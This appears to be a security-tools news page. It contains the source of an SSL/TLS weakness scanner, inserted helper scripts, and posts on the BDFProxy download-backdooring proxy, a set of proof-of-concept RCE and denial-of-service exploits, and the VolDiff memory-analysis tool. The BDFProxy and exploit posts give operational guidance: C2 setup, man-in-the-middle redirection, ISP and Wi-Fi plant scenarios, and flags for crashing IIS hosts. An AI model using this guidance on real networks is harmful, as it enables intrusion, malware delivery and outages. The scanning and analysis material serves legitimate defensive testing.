Channel: Bash Script – Security List Network™

HTTPSScan – Shell script for testing the SSL/TLS Protocols


HTTPSScan is a Shell script for testing the SSL/TLS Protocols.


Check for SSL/TLS Vulnerabilities:
– SSLv2 (CVE-2011-1473)
– TLS CRIME (CVE-2012-4929)
– RC4 (CVE-2013-2566)
– Heartbleed (CVE-2014-0160)
– Poodle (CVE-2014-3566)
– FREAK (CVE-2015-0204)
– Weak Ciphers

Latest version 1.6: Heartbleed check added. Code:

#!/usr/bin/env bash

# Script to test the most security flaws on a target SSL/TLS.
# Author:  Alexos (alexos at alexos dot org)
# Date:    03-05-2015
# Version: 1.0
#
# References:
# OWASP Testing for Weak SSL/TLS Ciphers, Insufficient Transport Layer Protection 
# https://www.owasp.org/index.php/Testing_for_Weak_SSL/TLS_Ciphers,_Insufficient_Transport_Layer_Protection_%28OTG-CRYPST-001%29
# CVE-2011-1473
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1473
# CVE-2012-4929
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4929
# CVE-2013-2566
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2566
# CVE-2014-0160
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160
# CVE-2014-3566
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3566
# CVE-2015-0204
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0204
# Forward Secrecy
# http://blog.ivanristic.com/2013/06/ssl-labs-deploying-forward-secrecy.html
# Patching the SSL/TLS on Nginx and Apache Webservers
# http://alexos.org/2014/01/configurando-a-seguranca-do-ssl-no-apache-ou-nginx/

VERSION=1.6
# Use timeout(1) when it is installed to bound each handshake attempt to 5 seconds;
# the ${timeout_bin:+...} expansions below expand to nothing when it is absent.
timeout_bin=$(command -v timeout)
clear

echo ":::    ::::::::::::::::::::::::::::::::::  ::::::::  ::::::::  ::::::::     :::    ::::    ::: "
echo ":+:    :+:    :+:        :+:    :+:    :+::+:    :+::+:    :+::+:    :+:  :+: :+:  :+:+:   :+: "
echo "+:+    +:+    +:+        +:+    +:+    +:++:+       +:+       +:+        +:+   +:+ :+:+:+  +:+ "
echo "+#++:++#++    +#+        +#+    +#++:++#+ +#++:++#+++#++:++#+++#+       +#++:++#++:+#+ +:+ +#+ "
echo "+#+    +#+    +#+        +#+    +#+              +#+       +#++#+       +#+     +#++#+  +#+#+# "
echo "#+#    #+#    #+#        #+#    #+#        #+#    #+##+#    #+##+#    #+##+#     #+##+#   #+#+ "
echo "###    ###    ###        ###    ###        ########  ########  ######## ###     ######    #### "
echo "V. $VERSION by Alexos Core Labs                                                        "

if [ $# -ne 2 ]; then
   echo "Usage: $0 IP PORT"
   exit 1
fi

HOST=$1
PORT=$2
TARGET=$HOST:$PORT
red=`tput setaf 1`
reset=`tput sgr0`

function ssl2 {
ssl="`echo 'Q' | ${timeout_bin:+$timeout_bin 5} openssl s_client -ssl2 -connect "$TARGET" 2>/dev/null`"

proto=`echo "$ssl" | grep '^ *Protocol *:' | awk '{ print $3 }'`
cipher=`echo "$ssl" | grep '^ *Cipher *:' | awk '{ print $3 }'`

if [ "$cipher" = '' ]; then
        echo 'Not vulnerable.  Failed to establish SSLv2 connection.'
else
        echo "Vulnerable!  SSLv2 connection established using $proto/$cipher"
fi
}

function crime {
ssl="`echo 'Q' | ${timeout_bin:+$timeout_bin 5} openssl s_client -connect "$TARGET" 2>/dev/null`"
compr=`echo "$ssl" |grep 'Compression: ' | awk '{ print $2 } '`

if [ "$compr" = 'NONE' ]; then
        echo 'Not vulnerable. TLS Compression is not enabled.'
else
        echo "Vulnerable! Connection established using $compr compression."
fi
}

function rc4 {
ssl="`echo 'Q' | ${timeout_bin:+$timeout_bin 5} openssl s_client -cipher RC4 -connect "$TARGET" 2>/dev/null`"
proto=`echo "$ssl" | grep '^ *Protocol *:' | awk '{ print $3 }'`
cipher=`echo "$ssl" | grep '^ *Cipher *:' | awk '{ print $3 }'`
if [ "$cipher" = '' ]; then
echo 'Not vulnerable. Failed to establish RC4 connection.'
else
echo "Vulnerable! Connection established using $proto/$cipher"
fi
}

function heartbleed {
# This only reports whether the server advertises the heartbeat extension (id=15);
# a patched server that still offers the extension is flagged as well.
ssl="`echo 'QUIT' | ${timeout_bin:+$timeout_bin 5} openssl s_client -connect "$TARGET" -tlsextdebug 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo safe`"

if [ "$ssl" = 'safe' ]; then
        echo 'The host is not vulnerable to Heartbleed attack.'
else
        echo "The host is vulnerable to Heartbleed attack."
fi
}

function poodle {
ssl="`echo 'Q' | ${timeout_bin:+$timeout_bin 5} openssl s_client -ssl3 -connect "$TARGET" 2>/dev/null`"

proto=`echo "$ssl" | grep '^ *Protocol *:' | awk '{ print $3 }'`
cipher=`echo "$ssl" | grep '^ *Cipher *:' | awk '{ print $3 }'`

# An empty value also means no SSLv3 session (for instance when the local openssl
# was built without SSLv3 support), so it must not be reported as vulnerable.
if [ "$cipher" = '' -o "$cipher" = '0000' -o "$cipher" = '(NONE)' ]; then
        echo 'Not vulnerable.  Failed to establish SSLv3 connection.'
else
        echo "Vulnerable!  SSLv3 connection established using $proto/$cipher"
fi
}

function freak {
ssl="`echo 'Q' | ${timeout_bin:+$timeout_bin 5} openssl s_client -cipher EXPORT -connect "$TARGET" 2>/dev/null`"
cipher=`echo "$ssl" | grep '^ *Cipher *:' | awk '{ print $3 }'`
if [ "$cipher" = '' ]; then
         echo 'Not vulnerable.  Failed to establish connection with an EXPORT cipher.'
else
         echo "Vulnerable! Connection established using $cipher"
fi
}

function null {
ssl="`echo 'Q' | ${timeout_bin:+$timeout_bin 5} openssl s_client -cipher NULL -connect "$TARGET" 2>/dev/null`"
cipher=`echo "$ssl" | grep '^ *Cipher *:' | awk '{ print $3 }'`
if [ "$cipher" = '' ]; then
         echo 'Not vulnerable.  Failed to establish connection with a NULL cipher.'
else
         echo "Vulnerable! Connection established using $cipher"
fi
}


function weak40 {
ssl="`echo 'Q' | ${timeout_bin:+$timeout_bin 5} openssl s_client -cipher EXPORT40 -connect "$TARGET" 2>/dev/null`"

cipher=`echo "$ssl" | grep '^ *Cipher *:' | awk '{ print $3 }'`

if [  "$cipher" = '' ]; then
        echo 'Not vulnerable. Failed to establish connection with 40 bit cipher.'
else
        echo "Vulnerable! Connection established using 40 bit cipher"
fi
}


function weak56 {
ssl="`echo 'Q' | ${timeout_bin:+$timeout_bin 5} openssl s_client -cipher EXPORT56 -connect "$TARGET" 2>/dev/null`"

cipher=`echo "$ssl" | grep '^ *Cipher *:' | awk '{ print $3 }'`

if [  "$cipher" = '' ]; then
        echo 'Not vulnerable. Failed to establish connection with 56 bit cipher.'
else
        echo "Vulnerable! Connection established using 56 bit cipher"
fi
}

function forward {
ssl="`echo 'Q' | ${timeout_bin:+$timeout_bin 5} openssl s_client -cipher 'ECDH:DH' -connect "$TARGET" 2>/dev/null`"

proto=`echo "$ssl" | grep '^ *Protocol *:' | awk '{ print $3 }'`
cipher=`echo "$ssl" | grep '^ *Cipher *:' | awk '{ print $3 }'`

if [ "$cipher" = ''  -o  "$cipher" = '(NONE)' ]; then
        echo 'Forward Secrecy is not enabled.'
else
        echo "Enabled! Established using $proto/$cipher"
fi
}
echo
echo "[*] Analyzing SSL/TLS Vulnerabilities on $HOST:$PORT ..."
echo
echo "Generating Report...Please wait"
echo
echo "${red}==> ${reset} Checking SSLv2 (CVE-2011-1473)"
echo
ssl2
echo
echo "${red}==> ${reset} Checking CRIME (CVE-2012-4929)"
echo
crime
echo
echo "${red}==> ${reset} Checking RC4 (CVE-2013-2566)"
echo
rc4
echo
echo "${red}==> ${reset} Checking Heartbleed (CVE-2014-0160)"
echo
heartbleed
echo
echo "${red}==> ${reset} Checking Poodle (CVE-2014-3566)"
echo
poodle
echo
echo "${red}==> ${reset} Checking FREAK (CVE-2015-0204)"
echo
freak
echo
echo "${red}==> ${reset}Checking NULL Cipher"
echo
null
echo
echo "${red}==> ${reset} Checking Weak Ciphers"
echo
weak40
echo
weak56
echo
echo "${red}==> ${reset}Checking Forward Secrecy"
echo
forward
echo
#echo
#echo [*] Checking Preferred Server Ciphers
#sslscan $HOST:$PORT > $LOGFILE
#cat $LOGFILE| sed '/Prefered Server Cipher(s):/,/^$/!d' | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g"
#rm $LOGFILE
echo "[*] done"
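Every check in the script above decides "vulnerable" from the Protocol and Cipher lines of the openssl s_client output. A failed handshake shows up in three shapes: no output at all (for example when the local openssl was built without the requested protocol), a Cipher value of 0000, or a Cipher value of (NONE). The helper below is an added example, not part of HTTPSScan or Alexos' code; the function names session_field and classify_handshake and the three transcripts are constructed for illustration. It parses the same two lines and only reports an established session when a real cipher name is present, so all three failure shapes classify as "failed".

```shell
#!/bin/sh
# Added example (not HTTPSScan's own code): classify a captured
# `openssl s_client` transcript without mistaking a failed handshake
# for a successful (and therefore "vulnerable") one.

# Print the value of a "Name : value" line read from stdin.
# $1 is the field name, e.g. Protocol or Cipher. Leading and trailing
# whitespace is removed; only the first match is printed.
session_field() {
    sed -n "s/^[[:space:]]*$1[[:space:]]*:[[:space:]]*\(.*[^[:space:]]\)[[:space:]]*$/\1/p" | head -n 1
}

# Print "established <proto>/<cipher>" (exit 0) or "failed" (exit 1).
classify_handshake() {
    transcript="$1"
    proto=$(printf '%s\n' "$transcript" | session_field Protocol)
    cipher=$(printf '%s\n' "$transcript" | session_field Cipher)
    case "$cipher" in
        ''|0000|'(NONE)')
            # no session: empty output, SSLv3-style 0000, or (NONE)
            echo "failed"
            return 1 ;;
        *)
            echo "established $proto/$cipher"
            return 0 ;;
    esac
}

# Constructed transcripts (abbreviated s_client output, not captured from a real host).
OK_TRANSCRIPT=$(printf 'CONNECTED(00000003)\n---\nSSL-Session:\n    Protocol  : TLSv1.2\n    Cipher    : ECDHE-RSA-AES128-GCM-SHA256\n')
FAIL_TRANSCRIPT=$(printf 'CONNECTED(00000003)\nerror:ssl handshake failure\n---\nSSL-Session:\n    Protocol  : SSLv3\n    Cipher    : 0000\n')
NONE_TRANSCRIPT=$(printf 'CONNECTED(00000003)\n---\nSSL-Session:\n    Protocol  : TLSv1\n    Cipher    : (NONE)\n')

# Stand-alone demo: the empty string stands for openssl exiting with an error
# before any session was printed.
for t in "$OK_TRANSCRIPT" "$FAIL_TRANSCRIPT" "$NONE_TRANSCRIPT" ""; do
    classify_handshake "$t" || :
done
```

A scanner built on classify_handshake can use its exit status directly (`if classify_handshake "$out"; then echo Vulnerable; fi`), which keeps the "no output means not established" rule in one place instead of repeating string comparisons in every check.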

 

Download : Master.zip  | Clone Url
Source : https://github.com/alexoslabs


Update: The Backdoor Factory Proxy (BDFProxy) version 0.3.2.


For security professionals and researchers only.

Change : Add support for BDF 3.0

This script rides on two libraries for usage: The Backdoor Factory (BDF) and the mitmProxy.
Concept:
Patch binaries during download ala MITM.
Why:
Because a lot of security tool websites still serve binaries via non-SSL/TLS means.
Here’s a short list:

sysinternals.com
Microsoft - MS Security Essentials
Almost all anti-virus companies
Malwarebytes
Sourceforge
gpg4win
Wireshark
etc...

+ Supported Environment:

Tested on all Kali Linux builds, whether a physical beefy laptop, a Raspberry Pi, or a VM, each can run BDFProxy.

Install:
BDF is in bdf/
Run the following to pull down the most recent:

./install.sh

OR:

git clone https://github.com/secretsquirrel/the-backdoor-factory bdf/
If you get a certificate error, run the following:

mitmproxy
And exit [Ctrl+C] after mitmProxy loads.

Usage:

Update everything before each use:

./update.sh

 READ THE CONFIG!!!

-->bdfproxy.cfg

You will need to configure your C2 host and port settings before running BDFProxy. DO NOT overlap C2 PORT settings between different payloads. You’ll be sending linux shells to windows machines and things will be segfaulting all over the place. After running, there will be a metasploit resource script created to help with setting up your C2 communications. Check it carefully. By the way, everything outside the [Overall] section updates on the fly, so you don’t have to kill your proxy to change settings to work with your environment.

But wait! You will need to configure your mitm machine for mitm-ing! If you are using a wifiPineapple I modded a script put out by Hak5 to help you with configuration. Run ./wpBDF.sh and enter in the correct configs for your environment. This script configures iptables to push only http (non-ssl) traffic through the proxy. All other traffic is forwarded normally.

Then:

./bdf_proxy.py

Here’s some sweet ascii art for possible physical settings of the proxy:
Lan usage:

<Internet>----<mitmMachine>----<userLan>

WIFI Usage :

<Internet>----<mitmMachine>----<wifiPineapple>))

 Testing : 

Suppose you want to use your browser with Firefox and FoxyProxy to connect to test your setup.

    Update your config as follows:
    transparentProxy = False

    Configure FoxyProxy to use BDFProxy as a proxy.
    Default port in the config is 8080.

+ Logging:

We have it. The proxy window will quickly fill with massive amounts of cat links depending on the client you are testing. Use tail -f proxy.log to see what is getting patched and blocked by your blacklist settings. However, keep an eye on the main proxy window if you have chosen to patch binaries manually; things move fast and behind the scenes there is multi-threading of traffic, but the initial requests and responses are locking for your viewing pleasure.

+ Attack Scenarios (all with permission of targets):
-Evil Wifi AP
-Arp Redirection
-Physical plant in a wiring closet
-Logical plant at your favorite ISP

Download version :
BDFProxy-0.3.2.tar.gz(14 KB)
BDFProxy-0.3.2.zip(14 KB)  | Our Post Before | Source : https://github.com/secretsquirrel

Contact the developer on:
IRC: irc.freenode.net #BDFactory
Twitter: @midnite_runr

Updates Exploits v-16.04.15 – Miscellaneous proof of concept exploit code.


Changelog and tool added 16/04/2015:
+ iislap.py : Added very specific KILL flag
+ DoS Exploit for MS-15-034, http.sys Remote Denial of Service/Remote Code Execution, for IIS.

Screenshot: testing with SSL.

Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes.
Updates Exploits 16.04.2015 :
+ phpMoAdmin Remote Code Execution (CVE-2015-2208)
+ LotusCMS Remote Code Execution (OSVDB-75095)
+ ElasticSearch Remote Code Execution (CVE-2015-1427)
+ ShellShock (httpd) Remote Code Execution (CVE-2014-6271)
+ IISlap – http.sys Denial of Service/RCE PoC (DoS only). (MS-15-034)
+ TBA

There are no changelogs here, as that would be too much effort, just git commits. Exploits may be updated regularly for greater stability, reliability or stealthiness, so check them for updates regularly.

Screenshot: testing without SSL.

DoS Exploit for MS-15-034, http.sys Remote Denial of Service/Remote Code Execution, for IIS.
The “http.sys” component in Microsoft Windows is vulnerable to a denial of service or remote code execution exploit. Microsoft is withholding exact details of the vulnerability currently; however, denial of service exploit code is becoming available in the wild and in use, hence we decided to release our proof of concept utility for the vulnerability.
The impact of this vulnerability is that it can cause a denial of service condition against the host (“Blue Screen of Death”), or, lead to remote code execution under the context of the SYSTEM user on the affected host. This leads either to complete loss of availability, or, complete compromise of confidentiality and integrity of data on the host, and probable loss of availability.

Usage :
To use this exploit/test utility, there are 4 arguments: -t/--target, which is mandatory, and is the IP address or hostname of the target host; -p/--port, the target port, which defaults to 80; -s/--ssl, which tells it to use SSL (defaults to no SSL); and -f/--file, which is the path to the file you wish to GET on the remote host. This defaults to “/”, or the webroot. It should be noted that the denial of service condition seems to happen repeatably if you supply it with a file to GET instead of just the webroot, and this should be taken into account during testing. Static files are the ones to watch out for – dynamic files such as ones generated by server side scripts (such as ASP.NET pages) do not tend to lead to the box falling over. If you REALLY want to DoS the box (as a PoC, not recommended!), set the -k, or --kill flag. This leads to a far more reliable denial of service condition if combined with -f.

Usage Global Script:
To use, simply select which payload you want to use (currently only back_python.php is available, but I plan on adding back_php.php and back_perl.php at a later date). This is the “payload.php”. You also must specify a callback host and port, along with the URL to the vulnerable LotusCMS installation.

Download : Master.zip  | Clone Url | Our Post Before
Source : https://github.com/XiphosResearch | http://www.xiphosresearch.com/

VolDiff – Malware Memory Footprint Analysis.


VolDiff is a bash script that runs Volatility plugins against memory images captured before and after malware execution. It creates a report that highlights system changes.

VolDiff is a simple yet powerful malware analysis tool that enables malware analysts to quickly identify IOCs and understand advanced malware behaviour.

Use Directions:
1. Capture a memory dump of a clean Windows system and save it as “baseline.raw”. This image will serve as a baseline for the analysis.
2. Execute your malware sample on the same system, then take a second memory dump and save it as “infected.raw”.
3. Run VolDiff:

./VolDiff.sh path/to/baseline.raw path/to/infected.raw profile
"profile" should be "Win7SP0x86" or "Win7SP1x64" etc.

VolDiff will save the output of a selection of Volatility plugins for both memory images (baseline and infected), then it will create a report to highlight notable changes (new processes, network connections, injected code, drivers etc).
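The per-plugin comparison VolDiff performs can be shown on its own. The following is an added example and not VolDiff's own code: new_entries normalises two saved plugin outputs and prints the data rows found only in the infected image, and count_new_entries wraps it for scripting. The two netscan samples are constructed for illustration (RFC 1918 and RFC 5737 addresses, not observations from the page), and the function names are assumptions of this example. The same comparison applies to any line-oriented plugin output (pslist, psscan, mutantscan and so on).

```shell
#!/bin/sh
# Added example (not VolDiff's own code): report the rows of a Volatility
# plugin output that exist only in the infected image.

export LC_ALL=C   # fixed collation so sort(1) and comm(1) agree on ordering

# Normalise one plugin output file: strip trailing whitespace (Volatility pads
# columns), drop blank lines, then sort uniquely so comm can compare line by line.
normalize_rows() {
    sed -e 's/[[:space:]]*$//' -e '/^$/d' "$1" | sort -u
}

# Print rows present in INFECTED_FILE ($2) but absent from BASELINE_FILE ($1).
# Header and separator lines occur in both files, so they are suppressed too.
new_entries() {
    base_tmp=$(mktemp) || return 1
    inf_tmp=$(mktemp) || return 1
    normalize_rows "$1" > "$base_tmp"
    normalize_rows "$2" > "$inf_tmp"
    # comm -13: suppress column 1 (baseline only) and column 3 (common to both)
    comm -13 "$base_tmp" "$inf_tmp"
    rm -f "$base_tmp" "$inf_tmp"
}

# Number of new rows, usable as a quick "did anything change" signal.
count_new_entries() {
    new_entries "$1" "$2" | grep -c '^'
}

# Constructed sample netscan output for the two images. The baseline row for
# PID 4 carries trailing padding on purpose to show that normalisation makes it
# compare equal to the unpadded row in the infected capture.
BASELINE_NETSCAN=$(mktemp)
INFECTED_NETSCAN=$(mktemp)
cat > "$BASELINE_NETSCAN" <<'EOF'
Offset(P)          Proto    Local Address                  Foreign Address      State            Pid      Owner          Created
0x3da3f618         TCPv4    10.0.0.5:139                   0.0.0.0:0            LISTENING        4        System         
0x3daeccf8         TCPv4    10.0.0.5:49152                 10.0.0.1:443         ESTABLISHED      924      svchost.exe
EOF
cat > "$INFECTED_NETSCAN" <<'EOF'
Offset(P)          Proto    Local Address                  Foreign Address      State            Pid      Owner          Created
0x3da3f618         TCPv4    10.0.0.5:139                   0.0.0.0:0            LISTENING        4        System
0x3daeccf8         TCPv4    10.0.0.5:49152                 10.0.0.1:443         ESTABLISHED      924      svchost.exe
0x3dad8008         TCPv4    0.0.0.0:4444                   0.0.0.0:0            LISTENING        2108     explorer.exe
0x3fc7b630         TCPv4    10.0.0.5:49160                 203.0.113.10:80      ESTABLISHED      2108     explorer.exe
EOF

# Stand-alone demo in the report layout VolDiff uses.
echo "Suspicious new netscan entries"
echo "========================================================================="
new_entries "$BASELINE_NETSCAN" "$INFECTED_NETSCAN"
```

The two rows reported here (explorer.exe listening on 4444 and explorer.exe talking to an outside host) are exactly the kind of entry an analyst would read as an IOC; the row-level diff does not judge them, it only removes the noise that is identical in both captures. Rows whose text legitimately changes between captures (timestamps, rotating PIDs) will show up as new, which is why VolDiff's own report is still reviewed by hand.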

Example Output :

PC-RESEARCHERS$ ./VolDiff.sh 
 _    __      ______  _ ________
| |  / /___  / / __ \(_) __/ __/
| | / / __ \/ / / / / / /_/ /_  
| |/ / /_/ / / /_/ / / __/ __/  
|___/\____/_/_____/_/_/ /_/     

Volatility analysis report generated by VolDiff v0.9.1 (https://github.com/aim4r/VolDiff).

Suspicious new netscan entries
=========================================================================

Offset(P)          Proto    Local Address                  Foreign Address      State            Pid      Owner          Created
0x3da3f618         TCPv4    172.16.108.128:139             0.0.0.0:0            LISTENING        4        System         
0x3daeccf8         TCPv4    0.0.0.0:80                     0.0.0.0:0            LISTENING        2108     explorer.exe   
0x3dad8008         TCPv4    172.16.108.128:49167           62.24.131.168:80     CLOSED           924      svchost.exe    
0x3fc7b630         TCPv4    172.16.108.128:49164           65.55.50.157:443     CLOSED           924      svchost.exe    
0x3fc8b5f0         TCPv4    172.16.108.128:49165           62.24.131.168:80     CLOSED           924      svchost.exe    
0x3fdf2348         TCPv4    172.16.108.128:49168           87.236.215.151:80    CLOSED           2108     explorer.exe   


Suspicious new pslist entries
=========================================================================

Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit                          
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x855c9738 wuauclt.exe            3976    924      5       97      1      0 2015-04-18 22:58:09 UTC+0000                                 
0x872de0c0 cmd.exe                1184   1544      0 --------      0      0 2015-04-18 22:58:29 UTC+0000   2015-04-18 22:58:29 UTC+0000  
0x8510c980 ipconfig.exe           2544   1184      0 --------      0      0 2015-04-18 22:58:29 UTC+0000   2015-04-18 22:58:29 UTC+0000  
0x85123030 conhost.exe            2560    360      0 --------      0      0 2015-04-18 22:58:29 UTC+0000   2015-04-18 22:58:29 UTC+0000  
0x8510c980 ipconfig.exe           2544   1184      0 --------      0      0 2015-04-18 22:58:29 UTC+0000   2015-04-18 22:58:29 UTC+0000  


Suspicious new psscan entries
=========================================================================

Offset(P)          Name                PID   PPID PDB        Time created                   Time exited                   
------------------ ---------------- ------ ------ ---------- ------------------------------ ------------------------------
0x000000003dade0c0 cmd.exe            1184   1544 0x3ee13380 2015-04-18 22:58:29 UTC+0000   2015-04-18 22:58:29 UTC+0000  
0x000000003fd0c980 ipconfig.exe       2544   1184 0x3ee135c0 2015-04-18 22:58:29 UTC+0000   2015-04-18 22:58:29 UTC+0000  
0x000000003f9c9738 wuauclt.exe        3976    924 0x3ee134e0 2015-04-18 22:58:09 UTC+0000                                 
0x000000003fd0c980 ipconfig.exe       2544   1184 0x3ee135c0 2015-04-18 22:58:29 UTC+0000   2015-04-18 22:58:29 UTC+0000  
0x000000003fd23030 conhost.exe        2560    360 0x3ee13500 2015-04-18 22:58:29 UTC+0000   2015-04-18 22:58:29 UTC+0000  

Suspicious new ldrmodules entries
=========================================================================

Pid      Process              Base       InLoad InInit InMem MappedPath
-------- -------------------- ---------- ------ ------ ----- ----------
     360 csrss.exe            0x4a040000 True   False  True  \Windows\System32\csrss.exe
     424 csrss.exe            0x011a0000 False  False  False \Windows\Fonts\vga850.fon
    1096 svchost.exe          0x00220000 True   False  True  \Windows\System32\svchost.exe
    1324 spoolsv.exe          0x009d0000 False  False  False \Windows\System32\spool\drivers\w32x86\3\fr-FR\PS5UI.DLL.mui
    2108 explorer.exe         0x04990000 False  False  False \Windows\System32\fr-FR\crypt32.dll.mui
    2108 explorer.exe         0x020b0000 False  False  False \Windows\System32\fr-FR\mpr.dll.mui
    2108 explorer.exe         0x040b0000 False  False  False \Windows\System32\fr-FR\urlmon.dll.mui
    2108 explorer.exe         0x06b80000 False  False  False \Windows\System32\imageres.dll
    2108 explorer.exe         0x04a70000 False  False  False \Windows\System32\fr-FR\oleaccrc.dll.mui
    2108 explorer.exe         0x03690000 False  False  False \Windows\System32\fr-FR\user32.dll.mui
    2108 explorer.exe         0x02280000 False  False  False \Windows\System32\fr-FR\shdocvw.dll.mui
    2108 explorer.exe         0x046e0000 False  False  False \Windows\System32\fr-FR\KernelBase.dll.mui
    2108 explorer.exe         0x03700000 False  False  False \Windows\System32\fr-FR\winmm.dll.mui
    2108 explorer.exe         0x02270000 False  False  False \Windows\System32\fr-FR\imageres.dll.mui
    3976 wuauclt.exe          0x00ac0000 True   False  True  \Windows\System32\wuauclt.exe
    3976 wuauclt.exe          0x00100000 False  False  False \Windows\System32\oleaccrc.dll
    3976 wuauclt.exe          0x00310000 False  False  False \Windows\System32\fr-FR\wucltux.dll.mui


Suspicious new malfind entries
=========================================================================

Process: explorer.exe Pid: 2108 Address: 0x22f0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 2, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x022f0000  4d 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00   MZ..............
0x022f0010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x022f0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x022f0030  00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00   ............@...

0x22f0000 4d               DEC EBP
0x22f0001 5a               POP EDX
0x22f0002 0000             ADD [EAX], AL
0x22f0004 0000             ADD [EAX], AL
0x22f0006 0000             ADD [EAX], AL
0x22f0008 0000             ADD [EAX], AL
0x22f000a 0000             ADD [EAX], AL
0x22f000c 0000             ADD [EAX], AL
0x22f000e 0000             ADD [EAX], AL
0x22f0010 0000             ADD [EAX], AL
0x22f0012 0000             ADD [EAX], AL
0x22f0014 0000             ADD [EAX], AL
0x22f0016 0000             ADD [EAX], AL
0x22f0018 0000             ADD [EAX], AL
0x22f001a 0000             ADD [EAX], AL
0x22f001c 0000             ADD [EAX], AL
0x22f001e 0000             ADD [EAX], AL
0x22f0020 0000             ADD [EAX], AL
0x22f0022 0000             ADD [EAX], AL
0x22f0024 0000             ADD [EAX], AL
0x22f0026 0000             ADD [EAX], AL
0x22f0028 0000             ADD [EAX], AL
0x22f002a 0000             ADD [EAX], AL
0x22f002c 0000             ADD [EAX], AL
0x22f002e 0000             ADD [EAX], AL
0x22f0030 0000             ADD [EAX], AL
0x22f0032 0000             ADD [EAX], AL
0x22f0034 0000             ADD [EAX], AL
0x22f0036 0000             ADD [EAX], AL
0x22f0038 0000             ADD [EAX], AL
0x22f003a 0000             ADD [EAX], AL
0x22f003c 40               INC EAX
0x22f003d 0000             ADD [EAX], AL
0x22f003f 00               DB 0x0


Process: explorer.exe Pid: 2108 Address: 0x10060000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 65537, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x10060000  55 89 e5 53 57 56 81 ec 9c 01 00 00 8b 45 08 c7   U..SWV.......E..
0x10060010  45 ec 04 00 00 00 8b 4d ec c7 45 c0 01 00 00 00   E......M..E.....
0x10060020  8b 55 c0 c7 85 e8 fe ff ff 01 00 00 00 8b b5 e8   .U..............
0x10060030  fe ff ff c7 85 18 ff ff ff 20 00 00 00 c6 85 53   ...............S

0x10060000 55               PUSH EBP
0x10060001 89e5             MOV EBP, ESP
0x10060003 53               PUSH EBX
0x10060004 57               PUSH EDI
0x10060005 56               PUSH ESI
0x10060006 81ec9c010000     SUB ESP, 0x19c
0x1006000c 8b4508           MOV EAX, [EBP+0x8]
0x1006000f c745ec04000000   MOV DWORD [EBP-0x14], 0x4
0x10060016 8b4dec           MOV ECX, [EBP-0x14]
0x10060019 c745c001000000   MOV DWORD [EBP-0x40], 0x1
0x10060020 8b55c0           MOV EDX, [EBP-0x40]
0x10060023 c785e8feffff01000000 MOV DWORD [EBP-0x118], 0x1
0x1006002d 8bb5e8feffff     MOV ESI, [EBP-0x118]
0x10060033 c78518ffffff20000000 MOV DWORD [EBP-0xe8], 0x20
0x1006003d c6               DB 0xc6
0x1006003e 85               DB 0x85
0x1006003f 53               PUSH EBX


Suspicious new timeliner entries
=========================================================================

1970-01-01 00:00:00 UTC+0000|[NETWORK CONNECTION]| 172.16.108.128:49164 -> 65.55.50.157:443| 924/TCPv4/CLOSED/0x3fc7b630
1970-01-01 00:00:00 UTC+0000|[NETWORK CONNECTION]| 172.16.108.128:49165 -> 62.24.131.168:80| 924/TCPv4/CLOSED/0x3fc8b5f0
1970-01-01 00:00:00 UTC+0000|[NETWORK CONNECTION]| 172.16.108.128:49167 -> 62.24.131.168:80| 924/TCPv4/CLOSED/0x3dad8008
1970-01-01 00:00:00 UTC+0000|[NETWORK CONNECTION]| 172.16.108.128:49168 -> 87.236.215.151:80| 2108/TCPv4/CLOSED/0x3fdf2348
2015-04-18 22:49:24 UTC+0000|[PROCESS]| lsm.exe| PID: 524/PPID: 412/POffset: 0x3e014030
2015-04-18 22:49:24 UTC+0000|[PROCESS]| services.exe| PID: 508/PPID: 412/POffset: 0x2594c3a8
2015-04-18 22:49:24 UTC+0000|[PROCESS]| winlogon.exe| PID: 480/PPID: 404/POffset: 0x3e368628
2015-04-18 22:49:25 UTC+0000|[PROCESS]| svchost.exe| PID: 640/PPID: 508/POffset: 0x3e072c48
2015-04-18 22:49:26 UTC+0000|[PROCESS]| vmtoolsd.exe| PID: 1544/PPID: 508/POffset: 0x3e178130
2015-04-18 22:49:27 UTC+0000|[PROCESS]| TPAutoConnSvc.| PID: 1792/PPID: 508/POffset: 0x3e1bbd40
2015-04-18 22:49:32 UTC+0000|[PROCESS]| conhost.exe| PID: 2184/PPID: 424/POffset: 0x3da32030
2015-04-18 22:49:32 UTC+0000|[PROCESS]| explorer.exe| PID: 2108/PPID: 2084/POffset: 0x3da16828
2015-04-18 22:51:27 UTC+0000|[PROCESS]| mscorsvw.exe| PID: 3176/PPID: 508/POffset: 0x3e135538
2015-04-18 22:56:42 UTC+0000|[NETWORK CONNECTION]| fe80::2587:a98d:6d2c:9d30:546 -> *:*| 756/UDPv6//0x3fd00008
2015-04-18 22:56:43 UTC+0000|[NETWORK CONNECTION]| ::1:1900 -> *:*| 3140/UDPv6//0x3df328f0
2015-04-18 22:56:43 UTC+0000|[NETWORK CONNECTION]| 127.0.0.1:1900 -> *:*| 3140/UDPv4//0x3f930008
2015-04-18 22:56:43 UTC+0000|[NETWORK CONNECTION]| 127.0.0.1:58120 -> *:*| 3140/UDPv4//0x3fce9008
2015-04-18 22:56:43 UTC+0000|[NETWORK CONNECTION]| ::1:58118 -> *:*| 3140/UDPv6//0x3f930a58
2015-04-18 22:56:43 UTC+0000|[NETWORK CONNECTION]| 172.16.108.128:137 -> *:*| 4/UDPv4//0x3fac8640
